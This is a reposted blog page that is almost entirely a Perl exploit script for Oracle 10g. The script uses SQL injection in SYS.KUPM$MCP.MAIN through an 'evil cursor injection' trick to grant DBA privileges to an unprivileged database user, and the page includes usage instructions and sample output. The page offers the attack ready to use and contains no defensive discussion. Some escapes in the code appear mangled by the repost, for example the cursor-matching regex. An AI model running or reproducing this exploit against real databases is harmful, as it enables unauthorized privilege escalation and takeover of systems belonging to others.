oracle10g漏洞,Oracle 10g KUPM$MCP.MAIN SQL Injection Exploit v2

最新推荐文章于 2021-04-12 20:07:41 发布

韩金虎

最新推荐文章于 2021-04-12 20:07:41 发布

阅读量270

点赞数

文章标签： oracle10g漏洞

这是一个针对Oracle 10g数据库的远程exploit Perl脚本，演示了如何无需"创建过程"权限就能通过"邪恶的游标注入"技巧，实现对无权限用户的DBA权限的授予和撤销。该脚本通过DBD::Oracle模块连接到数据库，并利用SYS.KUPM$MCP.MAIN漏洞进行操作。

摘要由CSDN通过智能技术生成

#!/usr/bin/perl

# Remote Oracle KUPM$MCP.MAIN exploit (10g)

# - Version 2 - New \"evil cursor injection\" tip!

# - No \"create procedure\" privilege needed!

# - See: http://www.databasesecurity.com/ (Cursor Injection)

# Grant or revoke dba permission to unprivileged user

# Tested on \"Oracle Database 10g Enterprise Edition Release 10.1.0.3.0\"

# REF: http://www.red-database-security.com/

# AUTHOR: Andrea \"bunker\" Purificato

# http://rawlab.mindcreations.com

# Oracle InstantClient (basic + sdk) required for DBD::Oracle

# bunker@fin:~$ perl kupm-mcpmainV2.pl -h localhost -s test -u bunker -p **** -r

# [-] Wait...

# [-] Revoking DBA from BUNKER...

# DBD::Oracle::db do failed: ORA-01951: ROLE \'DBA\' not granted to \'BUNKER\' (DBD ERROR: OCIStmtExecute) [for Statement \"REVOKE DBA FROM BUNKER\"] at kupm-mcpmainV2.pl line 104.

# [-] Done!

# bunker@fin:~$ perl kupm-mcpmainV2.pl -h localhost -s test -u bunker -p **** -g

# [-] Wait...

# [-] Creating evil cursor...

# Cursor: 2

# [-] Go ...(don\'t worry about errors)!

# DBD::Oracle::st execute failed: ORA-06512: at \"SYS.KUPM$MCP\", line 874

# ORA-06512: at line 3 (DBD ERROR: OCIStmtExecute) [for Statement \"

# BEGIN

# SYS.KUPM$MCP.MAIN(\'\'\' AND 0=dbms_sql.execute(2)--\',\'\');

# END;

# \"] at kupm-mcpmainV2.pl line 134.

# [-] YOU GOT THE POWAH!!

# bunker@fin:~$ perl kupm-mcpmainV2.pl -h localhost -s test -u bunker -p **** -r

# [-] Wait...

# [-] Revoking DBA from BUNKER...

# [-] Done!

use warnings;

use strict;

use DBI;

use Getopt::Std;

use vars qw/ %opt /;

sub usage {

print <

Syntax: $0 -h -s -u -p -g|-r [-P ]

Options:

-h target server address

-s target sid name

-u user

-p password

-g|-r (g)rant dba to user | (r)evoke dba from user

[-P Oracle port]

USAGE

exit 0

}

my $opt_string = \'h:s:u:p:grP:\';

getopts($opt_string, \\%opt) or &usage;

&usage if ( !$opt{h} or !$opt{s} or !$opt{u} or !$opt{p} );

&usage if ( !$opt{g} and !$opt{r} );

my $user = uc $opt{u};

my $dbh = undef;

if ($opt{P}) {

$dbh = DBI->connect(\"dbi:Oracle:host=$opt{h};sid=$opt{s};port=$opt{P}\", $opt{u}, $opt{p}) or die;

} else {

$dbh = DBI->connect(\"dbi:Oracle:host=$opt{h};sid=$opt{s}\", $opt{u}, $opt{p}) or die;

}

my $sqlcmd = \"GRANT ALL PRIVILEGE, DBA TO $user\";

print \"[-] Wait...

\";

$dbh->func( 1000000, \'dbms_output_enable\' );

if ($opt{r}) {

print \"[-] Revoking DBA from $user...

\";

$sqlcmd = \"REVOKE DBA FROM $user\";

$dbh->do( $sqlcmd );

print \"[-] Done!

\";

$dbh->disconnect;

exit;

}

print \"[-] Creating evil cursor...

\";

my $sth = $dbh->prepare(qq{

DECLARE

MYC NUMBER;

BEGIN

MYC := DBMS_SQL.OPEN_CURSOR;

DBMS_SQL.PARSE(MYC,\'declare pragma autonomous_transaction; begin execute immediate \'\'$sqlcmd\'\';commit;end;\',0);

DBMS_OUTPUT.PUT_LINE(\'Cursor: \'||MYC);

END;

} );

$sth->execute;

my $cursor = undef;

while (my $line = $dbh->func( \'dbms_output_get\' )) {

print \"$line

\";

if ($line =~ /^Cursor: (d)/) {$cursor = $1;}

}

$sth->finish;

print \"[-] Go ...(don\'t worry about errors)!

\";

$sth = $dbh->prepare(qq{

BEGIN

SYS.KUPM$MCP.MAIN(\'\'\' AND 0=dbms_sql.execute($cursor)--\',\'\');

END;

});

$sth->execute;

$sth->finish;

print \"[-] YOU GOT THE POWAH!!

\";

$dbh->disconnect;

exit;

韩金虎

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫